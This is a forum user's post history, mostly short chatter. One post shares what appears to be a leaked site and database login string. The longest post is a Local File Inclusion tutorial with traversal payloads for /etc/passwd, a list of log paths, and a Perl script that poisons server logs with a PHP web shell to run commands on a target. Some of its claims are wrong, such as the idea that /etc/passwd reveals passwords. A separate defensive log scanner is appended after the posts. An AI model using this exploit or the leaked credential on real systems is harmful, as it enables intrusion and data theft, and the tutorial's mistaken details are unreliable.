
Castiel

Active Members
  • Posts

    639
  • Joined

  • Last visited

Everything posted by Castiel

  1. If it's so simple, go on and do it yourself. I bet you won't solve anything.
  2. Since the user got banned, I think I can post the syntax. YourTrainer.com.cy - 5.5.35-logaandreou_yourtrainer:Castiel
  3. Glad to be here. I hope we'll get along.
  4. Any proof or something..?
  5. WTF!? Dark Panda hacker????
  6. security-antihackers@fbi.al sounds good, doesn't it?
  7. OFF: Why are you insulting him? ON: Welcome. wtf, what a name
  8. Thanks for the additions.
  9. Seriously, nobody?
  10. From an angel in the Supernatural series, and because paranormal.
  11. Nah, it's not worth it.
  12. Castiel

    Cum-sa.net

    I like the design and how it switches automatically in a mobile browser. Congratulations
  13. https://rstforums.com/forum/79476-noo-hacker.rst#post510906
  14. Sorry for the off-topic, but: ZatarraCoi=0x 5a617461727261436f69
  15. Happy birthday and good health!
  16. What is their email?
  17. So, where do I get the signature from, and what date do I put?
  18. http://ionutdesign.ro/index.html ! For incode, man, it's well known!!
  19. Yeah, well, let's have a laugh too.
  20. And how can I connect to the database? Having the details.
  21. askwrite, did you need a +1? ON: LFI - Local File Inclusion
  22. Did I say it was made by me :))? It's from pro-area; I only corrected some mistakes.
  23. Hi, rst! In this tutorial you will learn how to exploit the LFI vulnerability in a site. First, let's look at this small PHP code:

        <?php
        // The request parameter goes into include() without any validation.
        $page = $_GET['page'];
        include($page);
        ?>

    This is code that should never be used; it is vulnerable to LFI because the $page variable is not sanitized. OK, now let's take advantage of this vulnerability, using the following code:

        site.host/index.php?page=../../../../../../../etc/passwd

    If the site is hosted on Unix, the users' passwords are stored in /etc/passwd, and the code above shows us these passwords and the usernames. Now all you have left to do is decode the password. An encrypted password should look something like this:

        username:x:503:100:FullName:/home/username:/bin/sh

    In this example the password is x; another example of a password is:

        username:!:503:100:FullName:/home/username:/bin/sh

    Other "places" where you can find the passwords besides /etc/passwd would be:

        /etc/group
        /etc/security/group
        /etc/security/passwd
        /etc/security/user
        /etc/security/environ
        /etc/security/limits
        /etc/shadow

    If the browser shows a .php at the end of the inclusion (and so /etc/passwd.php will no longer exist), add at the end of the inclusion , and the server will ignore everything written after . Example code:

        site.host/index.php?file=../../../../../../../../etc/passwd

    Now we will try to run commands on the server by injecting PHP code into the logs and then running it. A few log locations:

        ../apache/logs/access.log
        ../../apache/logs/error.log
        ../../apache/logs/access.log
        ../../../apache/logs/error.log
        ../../../apache/logs/access.log
        ../../../../../../../etc/httpd/logs/acces_log
        ../../../../../../../etc/httpd/logs/acces.log
        ../../../../../../../etc/httpd/logs/error_log
        ../../../../../../../etc/httpd/logs/error.log
        ../../../../../../../var/www/logs/access_log
        ../../../../../../../var/www/logs/access.log
        ../../../../../../../usr/local/apache/logs/access_log
        ../../../../../../../usr/local/apache/logs/access.log
        ../../../../../../../var/log/apache/access_log
        ../../../../../../../var/log/apache2/access_log
        ../../../../../../../var/log/apache/access.log
        ../../../../../../../var/log/apache2/access.log
        ../../../../../../../var/log/access_log
        ../../../../../../../var/log/access.log
        ../../../../../../../var/www/logs/error_log
        ../../../../../../../var/www/logs/error.log
        ../../../../../../../usr/local/apache/logs/error_log
        ../../../../../../../usr/local/apache/logs/error.log
        ../../../../../../../var/log/apache/error_log
        ../../../../../../../var/log/apache2/error_log
        ../../../../../../../var/log/apache/error.log
        ../../../../../../../var/log/apache2/error.log
        ../../../../../../../var/log/error_log
        ../../../../../../../var/log/error.log
        ../apache/logs/error.log

    OK, now let's take a look at the log that records the pages which do not exist, and at the following code: <? passthru(\$_GET[cmd]) ?>. If we type in the browser:

        site.host/<? passthru(\$_GET[cmd]) ?>

    it will obviously show us a page saying that this code does not exist on the server, because the browser automatically encodes the URL, and the page we accessed is translated by the browser into:

        site.host/<? passthru(\$_GET[cmd]) ?>

    So we will have to do something else... We can use the following Perl script:

        #!/usr/bin/perl -w
        use IO::Socket;
        use LWP::UserAgent;
        $site="victim.com";
        $path="/folder/";
        $code="<? passthru(\$_GET[cmd]) ?>";
        $log = "../../../../../../../etc/httpd/logs/error_log";
        print "Trying to inject the code";
        $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
        print $socket "GET ".$path.$code." HTTP/1.1\r\n";
        print $socket "User-Agent: ".$code."\r\n";
        print $socket "Host: ".$site."\r\n";
        print $socket "Connection: close\r\n\r\n";
        close($socket);
        print "\nCode $code sucssefully injected in $log \n";
        print "\nType command to run or exit to end: ";
        $cmd = <STDIN>;
        while($cmd !~ "exit") {
            $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
            print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n";
            print $socket "Host: ".$site."\r\n";
            print $socket "Accept: */*\r\n";
            print $socket "Connection: close\r\n\n";
            while ($show = <$socket>) { print $show; }
            print "Type command to run or exit to end: ";
            $cmd = <STDIN>;
        }
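A defender's view of the requests described in the LFI post above, as an added example that is not part of the original post: a small scanner that flags path traversal, inclusion of system or log files, and PHP code stored in logged fields. It assumes the web server writes the common "combined" access-log format; the sample lines, finding names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined log format; quoted fields may hold backslash-escaped characters.
Q = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] ' + Q + r' (\d{3}) \S+ ' + Q + ' ' + Q + '$')
TRAVERSAL = re.compile(r'(?:\.\.[/\\]){2,}')        # repeated ../ climbing out of the web root
SENSITIVE = re.compile(r'/etc/(?:passwd|shadow|group|security/)')
LOG_TARGET = re.compile(r'(?:access|error)[._]log', re.I)
PHP_TAG = re.compile(r'<\?(?:php|=|\s)', re.I)      # PHP open tag stored in a logged field

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded requests are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client_ip, sorted findings) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, request, _status, _referer, agent = m.groups()
    request, agent = decode(request), decode(agent)
    findings = set()
    if TRAVERSAL.search(request):
        findings.add("path-traversal")
        if SENSITIVE.search(request):
            findings.add("system-file-target")
        if LOG_TARGET.search(request):
            findings.add("log-file-include")
    if PHP_TAG.search(request) or PHP_TAG.search(agent):
        findings.add("php-code-in-logged-field")
    return ip, sorted(findings)

def scan(lines):
    return [hit for hit in map(classify, lines) if hit and hit[1]]

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE = [
    '192.0.2.10 - - [10/Oct/2014:13:55:36 +0000] "GET /index.php?page=contact HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2014:13:56:01 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1021 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2014:13:57:12 +0000] "GET /folder/ HTTP/1.1" 404 209 "-" "<?php /* constructed */ ?>"',
    '198.51.100.7 - - [10/Oct/2014:13:57:40 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log&x=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

A 200 response on a line tagged `system-file-target` or `log-file-include` is the case to triage first, since it suggests the include actually resolved.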